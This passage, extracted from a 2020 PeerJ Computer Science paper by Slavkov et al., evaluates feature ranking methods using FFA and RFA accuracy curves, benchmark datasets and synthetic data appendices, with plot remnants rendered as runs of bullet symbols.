Comparison of RFA curves for the four different ranking methods for the combined dataset. The curves were obtained by using Decision Trees (A) and k-NN (B). Full-size DOI: 10.7717/peerj-cs.310/fig-6 1 Compare, for example, Fig. 5B (obtained by k-NN) with Fig. A1A (obtained by SVMs), which is given in Appendix 3 (note that Fig. A1A also contains the random ranking curve). Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 13/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-5 http://dx.doi.org/10.7717/peerj-cs.310/fig-6 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ The reason why, for example, the Naïve Bayes classifier does not show any difference between rankings, is the fact that it can not use the information from the interactions of higher order. Namely, it assumes feature independence. Hence, it is not appropriate for use in the considered context. If we proceed to RFA curves, again, the Naïve Bayes classifier does not show any difference between rankings, whereas the other four methods do. We prefer Random Forests, SVMs and k-NN over Decision Trees in the case of RFA curves, because Decision Trees generate quite unstable curves, as shown in Fig. 6A. In Fig. 6B, the RFA curves of k-NN are shown. Again, there is no quantitative difference between them and the RFA curves generated by SVMs2. Tu sum up, one can use � SVMs and k-NN models, for constructing FFA curves, � SVMs, k-NN and Random Forests, for constructing RFA curves. Thus, only k-NN and SVMs are appropriate for constructing both FFA and RFA curves. Since one should typically use approximate k-NN when the number of features is extremely high (Muja & Lowe, 2009), we use SVMs (with the settings described here) as the learner for constructing the FFA/RFA curves in all the remaining experiments in this work. Discussion We have to give some additional notes about choosing the best method, when, for example, different learning methods prioritize different rankings, which is possible since some learning method might make use of some features, whereas another learning method can make better use of some others. If we have computed feature rankings to learn a classifier that uses only a subset of (top-ranked) features and we have already decided on which classifier to use, we should use the same (type of) classifier to construct the curves, because we want to use the features that the chosen learning method prioritizes. Second, if our motivation for computing the feature rankings is to discover all relevant features for a given problem (e.g., the genes that influence the patients’ clinical state), and learning method A prioritizes the ranking R ¼ ðx1; x2; . . .Þ over the ranking R0 ¼ ðx10; x20; . . .Þ, whereas learning method B prioritizes R′ over R, this means that x1, x2, x1′ and x2′ are important (provided that both learners achieve similar accuracy), so we can include them all in the subsequent experiments (and thus use both learning methods). The decision about which among the two appropriate methods to use—k-NN or SVMs—might also depend on the properties of the dataset at hand. As mentioned before, k-NN could be too time-consuming when the number of features is extremely high. On the other hand, if the number of instances is high, SVMs could be too time-consuming, but speed-ups are possible (Tsang, Kwok & Cheung, 2005). As for the noise, both methods are quite robust (Wang, Jha & Chaudhuri, 2018; Xu, Caramanis & Mannor, 2009), so this is not among the most influential factors. 2 Compare Figs. 6B–A1B (given in “Appendix A3”). Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 14/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ FEATURE RANKING COMPARISON ON REAL-WORLDS DATASETS In this section, we move from the synthetic data and show the appropriateness of the proposed feature ranking evaluation method on the real-world data with unknown relevant and irrelevant features. To be consistent with the synthetic-data experiments, we evaluate the same four feature ranking methods as before, and compare them to the random feature rankings which now serve as the only baseline. Datasets description In this extensive study, 35 classification benchmark problems are used. They come in two bigger groups. The first group has been part of the experiments in (Slavkov et al., 2018) and except for aapc (Džeroski et al., 1997), water and diversity (Džeroski, Demšar & Grbović, 2000), mostly originates from the UCI data repository (Newman & Merz, 1998). This benchmark problems have higher number of instances (up to 5,000) and not extremely high number of features (up to 280). This problems cover various domains: health, ecology, banking etc. The second group is newly included and contains 11 high-dimensional micro-array benchmark problems (Mramor et al., 2007) (up to 12,625 features) with lower number of examples (up to 110). The main properties of the data are given in Table 1. Experimental setup We construct the curves that base on the feature ranking methods described in experimental setup part of “Analysis of Different Learning Methods to Construct FFA and RFA Curves”, and the curves that belong to the completely random ranking (i.e., expected curves) which serve as a baseline. For the actual construction of the curves (once the ranking is obtained), support vector machines were used, as described and justified in the results in “Analysis of Different Learning Methods to Construct FFA and RFA Curves”. The curves were constructed via 10-times stratified 10-fold cross validation, using different random seeds. The expected error curves for random rankings were produced by generating 100 random rankings for each dataset under consideration. For each random ranking, error curves were produced and the average of the error values was used as the expected error. This was done in a manner similar to the one described in “Evaluation by Randomising the Ground Truth Ranking”. As mentioned in “The Evaluation Method”, building FFA/RFA curves by adding the features one by one to large feature subsets Si and Si, might be too costly when n is big enough. In this set of experiments, we use the following procedure. We add δ(i) features to the subset, where δ(i) is defined as follows: δ(i) = 1 if 1 ≤ i ≤ 50, δ(i) = 5 if 50 < i ≤ 500, and δ(i) = n//20 otherwise, where // denotes integer division. Results In this section, we show representative examples of three types of curves: FFA, RFA and stability curves. The curves are shown for two datasets with lower and two with higher Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 15/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ number of features. The graphs for the other datasets can be found in “Appendix 4” in Figs. A2–A12. We start with the breast-w dataset. The FFA/RFA curves in Figs. 7A and 7B show that both types of curves are needed in order to evaluate the ranking completely. The FFA- Table 1 Properties of the benchmark datasets: number of instances, number of features, number of discrete/numeric attributes, and number of different class values. Dataset #Inst. #Feat. (D/N) #Cl. aapc 335 84 (83/1) 3 arrhythmia 452 280 (73/206) 16 australian 690 14 (8/6) 2 balance 625 4 (0/4) 3 breast-cancer 286 9 (9/0) 2 breast-w 699 9 (9/0) 2 car 1,728 6 (6/0) 4 chess 3,196 36 (36/0) 2 diabetes 768 8 (0/8) 2 diversity 292 86 (0/86) 5 german 1,000 20 (13/7) 2 heart 270 13 (6/7) 2 heart-c 303 13 (7/6) 5 heart-h 294 13 (7/6) 5 hepatitis 155 19 (13/6) 2 image 2,310 19 (0/19) 7 ionosphere 351 34 (0/34) 2 iris 150 4 (0/4) 3 sonar 208 60 (0/60) 2 tic-tac-toe 958 9 (9/0) 2 vote 435 16 (16/0) 2 water 292 80 (0/80) 5 waveform 5,000 21 (0/21) 3 wine 178 13 (0/13) 3 amlPrognosis 54 12,625 (0/12,625) 2 bladderCancer 40 5,724 (0/5,724) 3 breastCancer 24 12,625 (0/12,625) 2 childhoodAll 110 8,280 (0/8,280) 2 cmlTreatment 28 12,625 (0/12,625) 2 colon 62 2,000 (0/2,000) 2 dlbcl 77 7,070 (0/7,070) 2 leukemia 72 5,147 (0/5,147) 2 mll 72 12,533 (0/12,533) 3 prostate 102 12,533 (0/12,533) 2 srbct 83 2,308 (0/2,308) 4 Note: The datasets with a considerably high number of features are listed under the dashed line. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 16/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ curves suggest that all feature ranking algorithms (except for the random ranking) place only the relevant features at the beginning, since there is practically no difference if we compare the accuracy of the 89-feature (all) model and, for example, the 11-feature model. However, the RFA-curves show that all feature ranking algorithms—except for Info Gain—misplace some relevant features, since the Info-Gain-ranking-based models have the lowest accuracy by far in the RFA curves. Also, in the case of Info Gain, the accuracy cease to decrease after only cca. A total of 40 top-ranked features were removed. Figure 7C shows that Info Gain produces also the most stable rankings. We can see that the top-ranked feature is always the same, since the stability index of the Info Gain equals 0 at the point k = 1. The second most stable algorithm is ReliefF, the third is Random Forest and the least stable is SVM-RFE, but the difference between Random Forest and SVM-RFE is not considerable. 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 11 19 27 35 43 51 89 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 11 19 27 35 43 51 89 ● ● ● infoGain rforest relief svmRfe random B 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ●● ● ●●●●●●●●●● ●●● ●●●●● ●●●●●●●●● ●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●● ● ●● ● ● ● ● ● ●●●●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●● ●●●●●●●● ●●●●●●● ●●●●●●● ●●●●●●●●●●●●●●● 1 9 17 33 49 65 81 ● ● infoGain rforest relief svmRfe C 0 .3 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 9 17 25 33 41 49 80 ● ● ● infoGain rforest relief svmRfe random D 0 .3 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 9 17 25 33 41 49 80 ● ● ● infoGain rforest relief svmRfe random E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●● ●●●●●●●● ●●●●●●●●●●●● ● ● ● ● ● ● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●● 8 16 24 32 40 48 56 64 72 80 ● ● infoGain rforest relief svmRfe F Figure 7 Ranking quality assessment for datasets breast-w (A–C) and water (D–F) in terms of the FFA (A and D) and RFA curves (B and E), and rankings’ stability estimates (C and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-7 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 17/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-7 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Let us now take a look at the curves for the dataset water. From the FFA-curves in Fig. 7D, we see that ReliefF, Info Gain and Random Forest ought to have the same 21 top-ranked features, and as a consequence, the same last 59 = 80 − 21 features too. However, the first 21 features are ordered better by Info Gain and ReliefF, while the last 59 are more properly ordered by Random Forest. We can conclude that none of the rankings is ideal, but we can come close to the ideal one (in terms of FFA-curves), if we combine the first part of the ReliefF (or Info Gain) and the second part of Random Forest. This claim is also confirmed by the RFA-curves of Info Gain and ReliefF (Fig. 7E): these two algorithms indeed misplace some relevant features, since the accuracy of the model abruptly decreases and the end of the ranking. Figure 7F suggests that we should prefer Info Gain and ReliefF over Random Forest since they are more stable. However, we can also notice that Random Forest is the least stable at the beginning of the ranking but its stability increases when the number of features gets larger. 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ●● ● ● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●● ●●●● ●● ●●●●●● ●● ●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ●● ●● ●●●● ●● ●●●●●●●●● ●●●●●●●● ●●●● ●●●●●● ●●●●●●●●●●●●●● ●●●● ●●●●● ● ●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ●● ● ●● ●● ●● ●●● ●●●● ●●● ●●●● ●●●●●●● ● ●● ●● ●● ●●● ● ● ●● ●●● ●●●●●●●●●●●●●●●●● 1 13 29 45 101 8113 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ●●●● ●● ●●●●●●●● ●● ●●● ● ● ● ● ● ●●● ● ● ●●● ●●●● ● ●● ● ● ● ●● ●● ● ●●● ●● ●●●● ●●● ● ● ●● ●● ● ● ● ●●●● ● ● ● ●●●●●●●●●● ●● ● ●● ● ● ●●● ●●●●●●● ● ● ● ● ● ● ● ●●● ● ● ●●● ●● ● ●●●●● ●●● ● ●● ●●●● ●●●●● ● ●●● ● ●● ●●●●●●●●● ● ● ●● ● ● ● ● ● ●●●●● ●●●●●●●●●●●●●●●●●●●● ●● ● ● ●●●●● ●● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● 1 13 29 45 101 8113 ● ● ● infoGain rforest relief svmRfe random B 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ●●●●●●●● ●● ●● ●● ●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●● ●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●● ● ●● ●●●●● ●● ●● ●● ●● ●● ●●● ●●●● ●●●●● ●●●●●● ●●●●● ●●●●● ●●●●●● ●●●●●● ●●●●●●● ●●●●●●●●● ●●●●●●●●●●● ●●●●●●●●●●●●●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● 6 57 880 2920 4960 10000 ● ● infoGain rforest relief svmRfe C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●● ●● ● ● ● ● ● ●● ● ●● ●● ●● ● ● ●●● ●● ● ● ● ●●●●● ●● ● ● ● ● ●● ●● ●● ●● ●●●●●● ● ●● ● ●●● ● ● ● ●● ● ●●● ●●●●●●● ●●●●●●● ●● ● ● ● ● ●● ● ● ● ●● ● ●●● ● ● ● ● ● ●● ● ● ● ● ● ● ●● ● ●●●● ● ● ●● ● ●● ●●●●●● ●● ● ●● ● ● ●● ●●●● ● ● ● ● ●●●●●●●●●●●●●●●●●●●● ●●●●● ●● ●● ● ● ●● ● ●●●● ●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ●● ● ●●● ●●●●●●●●●●●●●●●●●● ●● 1 13 29 45 101 8177 ● ● ● infoGain rforest relief svmRfe random D 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●●● ●●●●● ●● ● ● ● ● ● ● ● ● ●●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●●● ● ● ●● ●● ●●●● ● ●●●● ●● ● ● ● ● ● ● ● ●● ● ●●● ● ● ● ● ●●● ●● ●●●●● ● ● ●● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ●● ●● ●● ● ● ● ●● ● ●●● ●●●●●● ● ● ● ● ● ● ●●● ●●● ●● ● ● ● ●● ● ● ● ●● ● ●● ● ●● ●● ● ●●●●●●●●●●●●●●●●●●●●● ●● ● ●●● ●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●● 1 13 29 45 101 8177 ● ● ● infoGain rforest relief svmRfe random E 0 .2 0 .4 0 .6 0 .8 1 .0 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ●●●●●●●● ●●●● ●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● 8 59 920 2960 5000 10100 ● ● infoGain rforest relief svmRfe F Figure 8 Ranking quality assessment for datasets mll (A–C) and amlPrognosis (D–F) in terms of the FFA (A and D) and RFA curves (B and E), and rankings’ stability estimates (C and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-8 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 18/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-8 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ We begin the analysis of the high-dimensional datasets with mll. Figure 8B shows that Random Forest completely misplaces some relevant features, since its RFA-curve mostly goes above the random-ranking one. Even though it is evident from Random Forest’s FFA-curves that some relevant features are also successfully captured, Random Forest produces the worst ranking. Info Gain is slightly better, whereas ReliefF and SVM-RFE are again the best algorithms. From the FFA-curves, we can conclude that SVM-RFE places more features with higher relevance at the beginning of the ranking (its curve is higher than ReliefF’s), while RFA-curves reveal that SVM-RFE also misses some quite relevant features: ReliefF’s curve is far below SVM-RFE’s. Figure 8C shows that ReliefF is considerably more stable than SVM-RFE, hence we prefer the former over the latter on the mll dataset. The last example will show that sometimes, the understanding of the results is not that easy. In the Figs. 8D and 8E, the FFA and RFA curves for the amlPrognosis dataset are presented. In this case, only Info Gain performs considerably better than random ranking in terms of FFA-curves. SVM-RFE is also able to find some relevant features at the beginning (peak of its curve at 10 features), but after that, the models’ accuracy decreases, hence mostly noisy features are positioned here. Some relevant features are again placed by ReliefF, Info Gain and Random Forest also around the 2,000th place (local peak of their curves in the right part of the FFA-curve). RFA-curves confirm that there is indeed much noise in these data, since removing features does not result in an (at least approximately) decreasing curve. It may not come as a surprise that all ranking algorithms produce rankings that are very unstable at the beginning (Fig. 8F), but it is interesting that after approximately 1,000 features, Info Gain and Random Forest produce quite stable rankings even though they have low quality. The reason for both low quality of rankings and their instability is probably the low number of instances accompanied by a high number of features (54 and 12,625 respectively). CONCLUSIONS We have proposed a method for evaluating and comparing feature rankings. The method is based on constructing two chains of predictive models that are built on two families of nested subsets of features. The first family of subsets are the sets of top-ranked features, while the second family consists of sets of bottom-ranked features. The predictive performances of the models form a FFA curve in the former case, and RFA curve in the latter case. We show in our experiments that both types of curves are necessary when comparing the rankings: FFA curves detect whether important features are placed at the beginning of the ranking, whereas RFA curves detect whether important features can still be found at the end of the ranking. In the set of experiments, we show the usefulness of the proposed evaluation method and its sensitivity to the rankings of different quality on synthetic data. The second set of experiments shows which of the learning methods are appropriate for building the Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 19/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ FFA and RFA curves (SVMs, k-NN) and which are not (Naïve Bayes, Decision Tree, Random Forest). In the third set of experiments on synthetic data, we test several feature ranking algorithms and examine their properties. Considering data with different properties, we show that ReliefF algorithm outperforms the other investigated approaches, both in terms of detecting relevant features and in terms of stability of the feature rankings it produces. Moreover, we show the usefulness of the proposed approach in real-world scenarios. We evaluate feature rankings computed by four feature ranking algorithms on 35 classification benchmark problems. The results reveal that there is no feature ranking algorithm that would dominate the others on every dataset. A possible disadvantage of the proposed method is that it can be computationally quite intensive, if we want to construct the curves in full resolution. Namely, every point of a FFA or RFA curve comes at the cost of building and evaluating a predictive model. However, as justified in the method description, the full resolution is, especially when the number of features is really high, not necessary, and, moreover, the construction of the curve can be also easily parallelized. The work presented in this article can continue in many directions. First, of all, the proposed methodology could use other error measures, since accuracy is appropriate only for the task of classification when the distribution of target variable is approximately uniform. The strong modularity of the FFA/RFA curves allows for their use in any other predictive modeling task, for example, for the task of regression, we could use root mean squared error instead of accuracy. However, even though there exists a regression version of most of the learners, which are considered for constructing the curves, experiments should be repeated on those cases, since the conclusions about, for example, the most appropriate learner for constructing the curves, can be different. Moreover, the method can be adapted not only to the regression setting, but also to different tasks of structured output prediction (Bakr et al., 2007) and time series prediction. APPENDIX 1 In this section, we explain how we generate our synthetic datasets. For simplicity, we take both the features Fi and the target Ft to be binary and take values from the set {0,1}. We then partition the set of features F into feature interaction subsets Fint of cardinality one and two. The feature sets with cardinality one are single features Fi that are in an individual interaction with the target Ft, while the features from the interaction sets with cardinality two determine the value of the target by the XOR relation. The examples are generated as follows. For each example, we first randomly (from a uniform distribution) set the value of the target feature Ft. After that, if Fint = {Fi}, then the value of feature Fi is randomly chosen, so that P(Fi = Ft) = p. Otherwise, we have Fint = {Fi, Fj}, and the values of the features Fi and Fj are randomly chosen, so that P(XOR(Fi, Fj) = Ft) = p. We consider the probability values p ∈ {0.8, 0.7, 0.6, 0.5}. The feature sets with p = 0.5 are in fact independent of the target Ft, and can be considered as irrelevant features. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 20/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ With combinations of these feature interaction sets, three datasets were generated, each of them consisting of 1,000 instances and 100 features in total. The first dataset (named single) comprises only individually correlated features. The second dataset (named pair) contains relevant features related to the target via the XOR relation, as well as irrelevant features. The third (named combined) is a combination of the first two. It contains XOR-related features and individually correlated features. In order to simulate the redundancy of features, which occurs in real datasets, the three datasets are constructed in the following way: If the set Fint of relevant features is included in the dataset, we also include two redundant copies of Fint in the dataset. Irrelevant features are realized independently of each other. The properties of the generated datasets are summarized in Table 2, from which we can observe that there are 9 relevant features in the single dataset, 18 in the pair dataset, and 27 in the combined dataset. The ground-truth feature relevances rel(Fi) of the features Fi are defined as follows. First, the relevance of each feature group Fint is defined as the mutual information between the group and Ft, namely rel(Fint) = I(Fint; Ft). Second, for Fi ∈ Fint, feature importances are obtained as relðFiÞ ¼ relðFintÞ=jFintj: (5) For the particular three datasets, this ground-truth ranking RGT should also result in the optimal FFA and RFA curves, but this may not be the case in general. In the next section, we give the results of comparing it to the other feature rankings. APPENDIX 2 When discussing the results in the “Evaluation by Randomising the Ground Truth Ranking”, we showed that, when the level of noise θ in the ranking increases, then (i) the quality of the ranking Rθ decreases, and (ii) the rankings RGT and Rθ become more and more distant. However, for the second point, we need to define a distance dist(RGT, Rθ) between a noisy and the ground truth ranking. In the definition of dist(RGT, Rθ) we use the average Spearman rank correlation coefficient ρ(RA, RB) which is calculated as Table 2 Properties of the synthetic datasets. Fint p #Copies in #Copies in #Copies in Single Pair Combined 0.8 3 3 0.7 3 3 0.6 3 3 0.8 3 3 0.7 3 3 0.6 3 3 0.5 91 82 73 Note: If p > 0.5, #copies denotes the number of copies of the interaction set. In the last row where p = 0.5, #copies corresponds to the number of independently realized irrelevant features. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 21/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 1 n � 1 Xn i¼1 ðrankAðFiÞ � rankAÞðrankBðFiÞ � rankBÞ rArB where n is the number of features, therefore the average ranks rankA and rankB equal (n + 1)/2. Standard variations σA, B are computed as rA;B ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiPn i¼1 ðrankA;BðFiÞ � rankA;BÞ q 2 = ðn � 1Þ. For a given θ, the distance between rankings RGT and Rθ is then computed as distðRGT; RhÞ ¼ 1 � 1 m Xm t¼1 qðRGT; Rh;tÞ (6) where m is the number of different realizations Rθ, t of the noisy ranking Rθ. Table 3 lists the values of the distances between the ground truth ranking RGT and its noisy versions Rθ. Note that, for all three synthetic datasets, the distances indeed increase when the amount of noise θ increases. APPENDIX 3 In “Evaluation by Randomising the Ground Truth Ranking”, we analyzed rankings of different quality (with different amounts of noise) by comparing them to the ground truth ranking. In a real-world setting, the ground truth ranking is unknown and the feature rankings are induced directly from data. Therefore, in this section we analyze feature rankings, produced by the four feature ranking methods from “Analysis of Different Learning Methods to Construct FFA and RFA Curves”, and the synthetic data described in “Generating Synthetic Data”. When comparing the rankings, stability should also be taken into account as discussed earlier. Therefore, the stability indicator (4) is also included in the analysis. Experimental setup We have used the same parameter settings for the feature ranking algorithms as in “Analysis of Different Learning Methods to Construct FFA and RFA Curves”. As noted and justified in the corresponding “Results”, SVMs were used for constructing the FFA/RFA curves. The curves were constructed via 10-times stratified 10-fold cross validation, using different random seeds. To complement them, we also estimate the stability of each feature ranking algorithm by using the stability indicator described in “Stability of Feature Ranking”. All feature ranking methods were tested only on the combined dataset. Table 3 The distances dist (RGT, Rq) for different q values, for each of the three synthetic datasets. θ 0.05 0.1 0.15 0.2 0.3 0.5 1 Single 0.219 0.34 0.449 0.51 0.628 0.81 1.056 Pair 0.126 0.239 